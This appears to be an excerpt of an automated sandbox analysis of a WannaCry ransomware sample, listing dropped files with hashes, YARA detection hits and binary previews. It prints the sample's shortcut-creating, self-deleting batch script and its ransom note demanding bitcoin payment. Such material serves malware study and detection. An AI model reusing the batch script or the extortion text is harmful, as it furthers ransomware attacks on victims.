                                                                                      Preview:..V..!.,Qb&Z:..E...a'...[....z....".......g.C.`....O..lD..(.......F.zJ.Q..,"^.fN...2=.....'ay.as............5!(.{......w....nr`.......7.OJ.53.8`!F.:M..2......b.m.W.....eG.1=Oy..O..t..Xl..~8B.&R.......08..{.1........:..G.1.()..uI.a=...Q.....[.>...JW.....v......m....*..oN....aO...<P..V$..4ES^ ..SH.^.|7.g.....!`._..Q.Gt..e^~.M.9....U.E.ha.y.e....P.W.W&._.:J .LQ-z._.......Q{ .%..#@.. ...w....t....}w...W..4.T...`7<..U;..j.j..Pq.e_.m..u_.E.Y..<.V0Z...Wg\.[.#...s...jO6..}B.A..eO...Y...)^4..d."x...T:.>9+8.. ......?..Y.R....h.k.5..:..mY:/......j.YI.4...VyE5>...g<."+.N..EJ.! B.....9..=...P.u.pmJ........MW..pq.?......7.@..`.(q....Y..Q%....fKW?l..+o.w.G.....`.,...L....]!.r................._.u...1I.?.).>[.@.O.u=.5....Q9ip..A:..B.%..r....c53......A..0..i..C...6@}..d.d....M.....T...[j.\..2.S..1.>..W......a.Yai:$..%.x...z..?MI..Dw.....k....f.\0?:.6]..U.....W.L.!..htV...u.PTR4j./..pq....HW....=.Y.VC.f....!#...k...K&.....$..Q... ....#p....7..m}[..^.CPe
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.822942739207619
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:YVDBllpaZGxWJT723xVSZi8Mn7MRyGZ6ewL0pGDNwm/S3u9/BL+feOn9PCP03OU4:rZGbVSAPwy0/9ma+9/BL8P3pjyHEfm
                                                                                      MD5:62263172B23D3E6B6DD0DC1A2D46363E
                                                                                      SHA1:94EF91734891474DAC3008867795F9308BC69447
                                                                                      SHA-256:1AF272EBFCC6CBF117C11EB5E631394937B2352C6CC273A55863695263DA163A
                                                                                      SHA-512:2022CE00E3EA316828B2B392A7B56DD6A79B3247A8CEB72A1B7450908BD32234F30DCBFDD9E4D2DCF931BC9657330E9277DC21A01A4AAC2BEC9B843484961AE9
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:V.p..1H.p.w.$._Y.z.j@U\...uv..$'..+....W.O..L..t..k..*.B......&..tn/(........0......jjK..qFPG..,&PQg.S..+..w...i......]..,.H...^...dj.7...G..L..].....|D.s.C.0x. .....Z8H.DJ./....LW....$.d..U.....J.5.@F.l>..`&..H.4M.}..;..M.Cz^....Sn....)...O.n.c.-r..7J....H....<*M...=........0.sd..~...Z...:.)}...zJ..^.c.TA.qt......E.!Q..qn.w......C)...;u.~A....-.....P{.{&.a.....|.=....i...x..M..........1cL.Qs.C.d...D..`..._.Ty;.N.}Qf.......hJ....H..&........*~.*%.e.)R9RP.`..0+...r.k...X.......R}1*m..}V.Bt^.....w..L..>....U...rZ.WM.A0.i.fH(.qe...N...o'..^.&JS./../.2X...I...v&....O...c....[. #G.bi....@.m....S....wa.t.{..t.T..k;..=...T).W....^Rz.=k....Z.]%..F...oB...s.e6a...4S.....8..8>.'`$.....<.. ...|..g...U..dy8fn....bw#z.38...W.O.q6.......\%..i..K..E.kFb.k....W?...l..x.F<j...`T.oN..$.y8+r0.&..4ku%........?..J...^.?..Y.........`.1`. k.S.R.k....~;.%...a..%...?\....+8....m|....L5..gK5'.?uy(>.+=z[.2.u^.}.$.Qx....~.......a..mns!.h....TJ.n3..=..... oH....JE.t
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.788151929938609
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:afqOX88Y1PvfqTVNQo9BsRz1udRO+3cbEGo2uqGl8:MXwUfvBG1uvqYwua
                                                                                      MD5:4CF8BDC8FDEABB1BDA352A80088E92D9
                                                                                      SHA1:B8EE9DDD085E51CE6BE9CD272DE25A1EA42E91CA
                                                                                      SHA-256:06D1F39BBB1A067A8DDA3EEF6636B06CBED0622FC7AA370A2B2C869B3FAE5F51
                                                                                      SHA-512:60C0C73D1BA104CF2BAF4B853FBA7DA4EA30CF1B3D030D59CFB1F298768A7FB8ADFA8CAE74F164AC1CF8DF67EDECE16ACA515AC81591BEDA32A88A125E80B6B7
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:...y...*..g..4..<..":.......T.K.sD_^.sO.....iD..L+..-........H....m.Tg.. ...a..p..j.....J....&.}.&.......>%|...L#...d...q..?..9'....,o<.q....k.._.g.....$........."k.b9....k..!...R[5.[./...IS..RE.w'E.75./....M:....?..rQ. @.C.......0IF..X..s%<.&E........dWT.=..F..4p...3.....o....^6...g..wG..e3.h.g.l.....^...`0..h5....R_:A.V5.J.}...:. jb...Zc...w.D.SN...>....gX.....?.d.6.<;.#v..PL.Z.....S,l........p..;...`a...S.(..k7B.|..Cz..'......._..=89...F.#J..G!..........d_....o9..Z!...{.k..._.K..........?..).l..._&...P*..LW..._E~xVOZ...W........@ .".uaP..c.2.x....D.4...c.R.g/,.Ik.L.F ak..P..m..i>.n..Z.q...]...../.....'.l..T|<./..&........[_.P%._.7/`.9+.>..+.|lNt'h....F.N]........B.Nr.........P....F).;Z.9].>K43#....M.............."..u.C.z...N..%!...i..........2.W.....yv6...r...K)...\..g..x@.z.....#......`..p26*.c..).6<..i.M#.%....].k.N...........!oh.:.W....4...S.0.Q...nMH...^I..i...U......\.ict.qs.6.&........d...d....@...(.........V%q.../_...&...jA..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.8214463186226055
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:inyxeITaHHBC0dUeZlMbFMj3Bw+BQ2Xn7D/D5vg/Le6ugWdqtcn:ikuHBCIlz3BrO2X/J2CLB
                                                                                      MD5:14D8FF3AC91DF8B1484A38EAC8E5ED9B
                                                                                      SHA1:E8DE1DD1FC67FEE81E42152C9E3A400BC70E23A6
                                                                                      SHA-256:5C05CEB38FEA534DFA9AD4338B4F621FA02580F159A63B3AC70751EE3142F5DB
                                                                                      SHA-512:7869A903DCBAE92644CE5ED53394D44BCE818C7E8EA65A69F4DBA7EFF27BD7CB9F8DC170958EBFDD58A2150E6FFCBA28C3017DBE8A1CE5E30E1FFFBAA0B9D47C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.Lc.=.oTFEK...&..G.s..._.&..f.J.B.w$7Y.B/.Q...).5&...A.].<...p...,{......6..#..q.D.....!2...s..R..K.g....."x..b...2.G...K.:.Rk...{.Y.\........>n.....w.-.....~8e..c.......\.......rop.Ka..(...2.Z'..!......;L..../.{i.Y.z....!.....+(T.9....'..o......V3v.....5.x...]56.....}.n79..^......hkW..|X......!.............|.e.Rv.....R....uh9=.}.R4.Z.U..w....s...G.Py%/O$g....d..w..}...n...+~f...Ny......;....,9Z..Ho4.`...].@....,...........fd9..zL...`Z:.Vd.\...._..(._.g.._A...v....[fjI,GlVf.*......D.7....X.U.b[.....G..%..z..H...~.hR.., #.....F"...g./..\+.`.p^D.......F..w..!..#Dk.fp.fT0?[. .V.v..<..It.)t%......fg...M{WS.3.)DL.q.%.VA{.....)G....S...6..%.6..m...t3c..d...u.{..._.mG`.h.g).+.........b..v)...1......[jQ.Q...F..EC...>....!..+.`.b...R.}.n7......;..........m..{Z...W.@U.....snY.p.$"[XY.........p...CC.,......E.....Z7$..fE.hq....<.@.....Ik...+.../.....|...h..6FU...4..!]3..$R.......*....XQ...JL.a;....q|.J^|.n.._.C....#.'>...j....S...H...q./:..j..;.....W..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:b.out overlay standalone executable V3.0 186 286 286 386
                                                                                      Category:dropped
                                                                                      Size (bytes):276
                                                                                      Entropy (8bit):7.124912406750719
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:mtNvdXEzX6hNpeDMTlSKuhiyJjENCjETnd8wWrkHc:Y1kSNp7pSZdoGETdtWQHc
                                                                                      MD5:6FF42638132785627E6D8BE365B43940
                                                                                      SHA1:4D74A920470557A1CB1A9509A178D6C97A82E5B1
                                                                                      SHA-256:53A0695ACC53FDA36ECABC87F90741FC6E483734519A8C6CCCC2A8B9292E58C5
                                                                                      SHA-512:3487021196453182BEE69E6685C04BE295CBBDE5ABAAD43622CAE13F0EA1BF5ED80CA6DBBC393ED9FE8080462A3C07BDF66A836FA8E3988DF149F1127D4D4FEE
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:........RSA1..........v..S9.+Q......+.=.'.= $..].X...........4....{ ..A..(....:.3W5...r."N..;.Wrx...;...nO...?!".<0.n.....8.f_.;....;%..n.Y.u..@...(....{.@#17..W.L.V..{1.C...M..).......)...r>...Z..|<..R.'.,......-]..P{wz..,_...C.H6....I...... ..w".?...k..X. ..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:modified
                                                                                      Size (bytes):136
                                                                                      Entropy (8bit):1.5731277788406879
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:7Fl7ltcxcYllln:xQcI/n
                                                                                      MD5:9AC70F554CE005FBB4F3CA6C8C0F90E1
                                                                                      SHA1:08B81D68D688AC32C583100A569FB722AF8CA581
                                                                                      SHA-256:4C264AF43C312193D4B5DA0C612F22B0028A2A7080FDAED6C9F72BAECE0CC992
                                                                                      SHA-512:C0C61073FF10CB3608647FC5C020F1393DB03897F7090AE8755FC21D65197AC12BF9301B1D5CF4C3EA34F7288A45221B0E7B3D971077F3A2ED5114203E2987EA
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..................................................................................................e................w..fc..e............
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:DOS batch file, ASCII text, with CRLF, CR line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):398
                                                                                      Entropy (8bit):5.161697904984017
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:hqn4+B9TRN23ff8xV3OgpPRN23ff8xV3O0F9a2T2ZLT2Ln:Q4+B9++w+qrT2r
                                                                                      MD5:67004FD55B29EF7D82514F75D025875D
                                                                                      SHA1:8EE599E5D76D43A3A71303C8AA766691E4A8BC0A
                                                                                      SHA-256:1D565ECCE72F526D5D164B51925C9A980AA04D127B8C2E02208A8B724A03501F
                                                                                      SHA-512:2C36F8689237F060427405E3F54CF266CAC3D64B84CC22E53E94049299A2E3A9E7D5A894DA80190D8ED93668D8EAC5C2837C4E4C0E00CF2079E5620FBB0C34F8
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: WannCry_BAT, Description: Detects WannaCry Ransomware BATCH File, Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\58191711205328.bat, Author: Florian Roth
                                                                                      Reputation:low
                                                                                      Preview:@echo off...echo SET ow = WScript.CreateObject("WScript.Shell")> m.vbs...echo SET om = ow.CreateShortcut("C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe.lnk")>> m.vbs...echo om.TargetPath = "C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe">> m.vbs...echo om.Save>> m.vbs...cscript.exe //nologo m.vbs...del m.vbs.....del /a %0..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):933
                                                                                      Entropy (8bit):4.711824502619554
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
                                                                                      MD5:7A2726BB6E6A79FB1D092B7F2B688AF0
                                                                                      SHA1:B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
                                                                                      SHA-256:840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
                                                                                      SHA-512:4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):245760
                                                                                      Entropy (8bit):6.278920408390635
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                                                      MD5:7BF2B57F2A205768755C07F238FB32CC
                                                                                      SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                                                      SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                                                                      SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe, Author: Joe Security
                                                                                      • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe, Author: ReversingLabs
                                                                                      • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe, Author: Joe Security
                                                                                      • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe, Author: ReversingLabs
                                                                                      • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe, Author: Joe Security
                                                                                      • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe, Author: ReversingLabs
                                                                                      • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe, Author: Joe Security
                                                                                      • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe, Author: ReversingLabs
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 96%
                                                                                      Reputation:low
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\SysWOW64\cscript.exe
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Mar 23 13:47:49 2024, mtime=Sat Mar 23 13:47:49 2024, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):1189
                                                                                      Entropy (8bit):5.040493253287504
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:88qLHOLm86eCRBlgK21Z5bpEO9l7vQAPic3qygm:882HOLm8iRyv17vPQyg
                                                                                      MD5:702D04031DD9BF002906D9511CD8FA24
                                                                                      SHA1:332DBCC83F66AEE905A99AE92416F189CFCF545F
                                                                                      SHA-256:704A9F74AA11DF406AF01B1B417E5BEC073220739AA562F76DC18804C04F7BD4
                                                                                      SHA-512:6D246DCDDF79E7EC911A80C6F8DA38B292A79946B01C1E4BCED43347649018A7BCFD29812D8DC6DE61672F013246F571C1F7C07C7309E20DD3A13154788FEB8A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:L..................F.... ....{Q.1}...'g.1}...X.H............................X.:..DG..Yr?.D..U..k0.&...&.........{4.....S.0}....q.1}......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.HwX.u..............................A.p.p.D.a.t.a...B.P.1.....wX.u..Local.<......FW.HwX.u...........................M..L.o.c.a.l.....N.1.....wX.u..Temp..:......FW.HwX.u..........................O...T.e.m.p.......1.....wX.u..TEMP1_~1.ZIP..l......wX.uwX.u....c.....................?.o.T.e.m.p.1._.R.a.n.s.o.m.w.a.r.e...W.a.n.n.a.C.r.y...z.i.p.....t.2......J.. .@WANAD~1.EXE..X......wX.uwX.u.....Y........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......................-...........................C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.........|....I.J.H..K..:...`.......X.......134349...........hT..CrF.f4... .P.............%..hT..CrF.f4... .P.............%.............1SPS.XF.L8C.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):3197106
                                                                                      Entropy (8bit):6.130063064844696
                                                                                      Encrypted:false
                                                                                      SSDEEP:98304:W5FYc9YouOquJVqrR1LlZRUT83DlJrqd+kq:WrjYouOquJgrlZ283xFqdq
                                                                                      MD5:6ED47014C3BB259874D673FB3EAEDC85
                                                                                      SHA1:C9B29BA7E8A97729C46143CC59332D7A7E9C1AD8
                                                                                      SHA-256:58BE53D5012B3F45C1CA6F4897BECE4773EFBE1CCBF0BE460061C183EE14CA19
                                                                                      SHA-512:3BC462D21BC762F6EEC3D23BB57E2BAF532807AB8B46FAB1FE38A841E5FDE81ED446E5305A78AD0D513D85419E6EC8C4B54985DA1D6B198ACB793230AEECD93E
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:low
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......... ........!.....J... ..0...........`.....c..........................!.......0...@... .........................A....`..\.......<.......................h...................................................4c...............................text....H.......J..................`.p`.data...\d...`...f...P..............@.`..rdata..............................@.`@.bss.........p........................`..edata..A............V..............@.0@.idata..\....`......................@.0..CRT....,...........................@.0..tls.... ............ ..............@.0..rsrc...<............"..............@.0..reloc..h............(..............@.0B/4............ ......& .............@.@B/19.....;z.... ..|...( .............@..B/31.....`....@!....... .............@..B/45.....'....`!....... .............@..B/57...........!....... .............@.0B/70.....".....!....... .
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):719217
                                                                                      Entropy (8bit):5.981438230537172
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:Ir2r5rFriGKbgai112Yq/5hcQTcGzAHzSHeqoftOEEdD4B2pihSpKOKm:naiV25uQTcGzAHOEW+Pzm
                                                                                      MD5:90F50A285EFA5DD9C7FDDCE786BDEF25
                                                                                      SHA1:54213DA21542E11D656BB65DB724105AFE8BE688
                                                                                      SHA-256:77A250E81FDAF9A075B1244A9434C30BF449012C9B647B265FA81A7B0DB2513F
                                                                                      SHA-512:746422BE51031CFA44DD9A6F3569306C34BBE8ABF9D2BD1DF139D9C938D0CBA095C0E05222FD08C8B6DEAEBEF5D3F87569B08FB3261A2D123D983517FB9F43AE
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:low
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........t.........!.....@...................P.....e......................... ............@... ......................P..4H......................................t+.....................................................4............................text...T?.......@..................`.P`.data........P.......F..............@.`..rdata.. ....`.......J..............@.`@.bss.........0........................`..edata..4H...P...J..................@.0@.idata...............X..............@.0..CRT....,............h..............@.0..tls.... ............j..............@.0..reloc..t+.......,...l..............@.0B/4..................................@.@B/19.................................@..B/31......(.......*...|..............@..B/45.....1*... ...,..................@..B/57..........P......................@.0B/70.....v....p......................@..B/81....................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):417759
                                                                                      Entropy (8bit):5.853358941151938
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:g8r2rQrFr0XGXnZ7rvzRsiWqnjmYl5oHIH9A:gtXGJnvmiggA
                                                                                      MD5:E5DF3824F2FCAD0C75FD601FCF37EE70
                                                                                      SHA1:902418A4C5F3684DBA5E3246DE8C4E21C92D674E
                                                                                      SHA-256:5CD126B4F8C77BDF0C5C980761A9C84411586951122131F13B0640DB83F792D8
                                                                                      SHA-512:7E70889B46B54175C6BADA7F042F5730CA7E3D156F7B6711FDF453911E4F78D64A2A8769EB8F0E33E826A3B30E623B3CD4DAF899D9D74888BB3051F08CF34461
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:low
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........k......!.....`...4...............p.....b......................................@... ..............................@...............................p...............................`......................pB...............................text...._.......`..................`.P`.data........p.......f..............@.`..rdata..xr.......t...j..............@.`@.bss..................................`..edata...........0..................@.0@.idata.......@......................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..reloc.......p....... ..............@.0B/4......P............:..............@.@B/19.................>..............@..B/31..........0......................@..B/45..........P......................@..B/57.....<....p......................@.0B/70....."...........................@..B/81.....B...............
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):411369
                                                                                      Entropy (8bit):5.909395689751269
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:oLQzG3CaDYuKCsZW9p2M8suCOSNKOM0LE5BtBsxvQkVgA2+FOYtLEgZEVPSm0aQY:oWHMACLoYaQ2bj+b0pJ
                                                                                      MD5:6D6602388AB232CA9E8633462E683739
                                                                                      SHA1:41072CC983568D8FEEB3E18C4B74440E9D44019A
                                                                                      SHA-256:957D58061A42CA343064EC5FB0397950F52AEDF0594A18867D1339D5FBB12E7E
                                                                                      SHA-512:B37BF121EA20FFC16AF040F8797C47FA8588834BC8A8115B45DB23EE5BFBEBCD1E226E9ACAB67B5EE43629A255FEA2CEEE4B3215332DD4127F187EE10244F1C3
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:low
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........b.........!...............................l......................... ............@... .................................................................h...................................................L................................text...............................`.P`.data...............................@.`..rdata..DR... ...T..................@.`@.bss..................................`..edata...............T..............@.0@.idata...............p..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..h...........................@.0B/4......8...........................@.@B/19.....W.... ......................@..B/31......%.......&...v..............@..B/45......&...0...(..................@..B/57..........`......................@.0B/70.....v....p......................@..B/81.....................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):523262
                                                                                      Entropy (8bit):5.7796587531390795
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:+ymz8Jq1p95avGpuO+/jUE8ADu2kNBMY8KHNygoB0+6tMqSsVwvN:+ylSZ+/jU7ynIK5Bb6Y
                                                                                      MD5:73D4823075762EE2837950726BAA2AF9
                                                                                      SHA1:EBCE3532ED94AD1DF43696632AB8CF8DA8B9E221
                                                                                      SHA-256:9AECCF88253D4557A90793E22414868053CAAAB325842C0D7ACB0365E88CD53B
                                                                                      SHA-512:8F4A65BD35ED69F331769AAF7505F76DD3C64F3FA05CF01D83431EC93A7B1331F3C818AC7008E65B6F1278D7E365ED5940C8C6B8502E77595E112F1FACA558B5
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:low
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!.....B...p...............`.....l.........................p......5(....@... .................................l....................................................................................................................text...X@.......B..................`.P`.data...8....`.......H..............@.0..rdata..<....p.......J..............@.`@.bss..................................`..edata...............Z..............@.0@.idata..l............f..............@.0..CRT....,............l..............@.0..tls.... ............n..............@.0..reloc...............p..............@.0B/4...................v..............@.@B/19.....Du.......v..................@..B/31....._o...p...p..................@..B/45..................l..............@..B/57.....|-...p......................@.0B/70.....J...........................@..B/81.................(..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):92599
                                                                                      Entropy (8bit):5.351249974009154
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:pEiL38qIuOFcErNX5d0tRCZiBP2DrbjgpfM2ydbv:aiLsqIHFPpdiU2q
                                                                                      MD5:78581E243E2B41B17452DA8D0B5B2A48
                                                                                      SHA1:EAEFB59C31CF07E60A98AF48C5348759586A61BB
                                                                                      SHA-256:F28CAEBE9BC6AA5A72635ACB4F0E24500494E306D8E8B2279E7930981281683F
                                                                                      SHA-512:332098113CE3F75CB20DC6E09F0D7BA03F13F5E26512D9F3BEE3042C51FBB01A5E4426C5E9A5308F7F805B084EFC94C28FC9426CE73AB8DFEE16AB39B3EFE02A
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Reputation:low
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!.........4...............0.....h................................<.....@... ......................`..i....p..................................@....................................................q...............................text...............................`.P`.data........0......."..............@.0..rdata..h....@.......$..............@.0@.bss.........P........................`..edata..i....`.......*..............@.0@.idata.......p.......,..............@.0..CRT....,............2..............@.0..tls.... ............4..............@.0..reloc..@............6..............@.0B/4...................:..............@.@B/19.....n|.......~...<..............@..B/31..........@......................@..B/45..........`......................@..B/57.....$...........................@.0B/70....."...........................@..B/81.....w...............
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):711459
                                                                                      Entropy (8bit):5.884120014912355
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:hXhKnXI0Fkw80VEJtzwIA6Ouah6ESyrWlp36Z:thKnnkw80VEJtzwIAiazSxlFw
